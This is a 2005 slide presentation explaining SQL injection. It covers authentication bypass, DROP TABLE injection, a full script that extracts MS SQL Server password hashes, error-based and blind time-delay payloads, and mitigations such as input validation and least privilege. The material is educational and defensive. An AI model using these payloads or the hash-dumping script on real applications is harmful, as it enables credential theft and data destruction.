SQL_Injection by phanleson

VIEWS: 503 PAGES: 19

									SQL Injection Attacks
Andrey Rakowitsch November 18th 2005


First: What is SQL?
• Structured Query Language: interface to relational database systems. • Allows for insert, update, delete, and retrieval of data in a database. • ANSI, ISO Standard, used extensively in web applications. • Example: select ProductName from products where ProductID = 40;

How is it normally used in websites?
1. Take user input from a web form and pass it to a server-side script via HTTP methods such as POST or GET. Process request, open connection to database. Query database and retrieve results. Send processed results back to user.
Web server Application server Database server

2. 3. 4.


PHP example
$name = $HTTP_POST_VARS["name"]; $query = “select * from restaurants where name = „”.$name.”‟”; $result = mysql_query($query);


What is SQL Injection?
• The ability to inject SQL commands into the database engine through existing application. • For example, if user input is “23 or 1 = 1” select ProductName from products where ProductID = 23 or 1 = 1 • All product names will be returned. Data leak.

What is SQL Injection?
• Flaw in web application not in database or web server. • No matter how patched your system is, no matter how many ports you close, an attacker can get complete ownership of your database. • NMap or Nessus will not help you against sloppy code. • In essence client supplied data without validation.

Brief History of SQL Injection
• First mention by rain forest puppy in Phrack 54, December 1998. • In February 2000 rfp publishes: “How I hacked Packetstorm – A look at hacking wwwthreads via SQL”. • January 2002 Chris Anley published “Advanced SQL Injection in SQL Server Applications”. First in depth paper. • At Blackhat 2004, 0x90.org release SQeaL (predecessor to Absinthe).

What can SQL Injection do?
• Delete: Select productinfo from table where productname = „whatever’; DROP TABLE productinfo; -- ‟ • Bypass Authentication
– Select * from users where username=‟user ‟ and password=‟passwd ‟; – select * from users where username=‟admin’--’ and password=‟whocares‟;

Not always that simple
• Grabbing MS SQL Server Hashes: '; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 end select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end -9

Possibilities are endless
• Some examples:
– Brute forcing passwords using attacked server to do the processing. – Interact with OS, reading and writing files. – Gather IP information through reverse lookup. – Start FTP service on attacked server. – Retrieve VNC passwords from registry. – File uploading.

Error Based SQL Injection
select * from table where id = convert(int,SYSTEM_USER) Output: [Microsoft][ODBC SQL Server Driver][SQLServer]Syntax error converting the nvarchar value ‟sa‟ to a column of data type int. • Error based SQL injection used solely on Microsoft SQL Servers

Blind SQL Injection
• When no explicit error information is available to the attacker. • Make use of boolean values to ask the database yes or no questions then interpret HTML results for TRUE and FALSE signatures. • Much slower: In the worst case scenario, it takes 7 yes or no questions to find the first character of a username using binary search. • That is why automated tools exist.

Blind SQL Injection (example)
• Base Cases:
• eng.usf.edu/results.jsp?id=4 and 1 = 1 (always true) • eng.usf.edu/results.jsp?id=4 and 1 = 0 (always false)

• Is the 8th character of the username greater than ASCII value 82? • Extract data a character at a time.


How to recognize T and F signatures?
• Several Solutions:
– Keyword search – MD5 Sum – Text Difference Engine – HTML Parse Tree – Linear representation of ASCII sums – Tolerance Band Comparison with subtractive filter – Adaptive filter

Blind SQL Injection
• NOTE: Even when boolean HTML signatures are not available, an attacker can use if statements to get a yes or no response. Examples:
– '; if condition waitfor delay '0:0:5' – '; union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1;

• Check and filter user input.
– Length limit on input (most attacks depend on long query strings). – Different types of inputs have a specific language and syntax associated with them, i.e. name, email, etc – Do not allow suspicious keywords (DROP, INSERT, SELECT, SHUTDOWN) as name for example. – Try to bind variables to specific types.

• Call stored procedures, instead of directly sending SQL statements to the database.
– Good in order to bind variables. – Has some overhead associated with it – Harder to code, not as flexible.


• Principal of Least Privilege
– A user or process should have the lowest level of privilege required in order to perform his assigned task. – If you know a specific user will only read from the database, do not grant him root privileges. – Segregate users. Define roles.


• Configure error reporting
– Never expose any information to the user.

• Intrusion Detection System
– It is possible to get signatures of SQL Injection (especially blind) attacks. – Log “DoS like” behavior. – “Warning: illegal use of this application has been detected. Legal actions will be taken..” – Random seed generation to mess up True and False signatures.

To top